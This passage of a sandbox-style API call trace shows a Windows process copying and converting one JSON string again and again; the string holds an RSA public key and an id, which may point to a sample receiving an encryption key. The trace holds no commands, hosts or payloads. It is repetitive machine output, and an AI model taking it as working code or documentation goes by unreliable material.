KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.541] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.542] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0111.595] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x220) returned 0x2b050b0 [0111.595] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc3c) returned 0x2b75008 [0111.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b050b0, cbMultiByte=-1, lpWideCharStr=0x2b75008, cchWideChar=1566 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 543 [0111.595] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc40) returned 0x2bbb8f8 [0111.595] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75008 | out: hHeap=0x2a0000) returned 1 [0111.596] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b050b0 | out: hHeap=0x2a0000) returned 1 [0111.596] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.596] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbb8f8 | out: hHeap=0x2a0000) returned 1 [0111.596] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x43e) returned 0x2b74a30 [0111.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa778, cbMultiByte=-1, lpWideCharStr=0x2b74a30, cchWideChar=543 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 543 [0111.596] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC 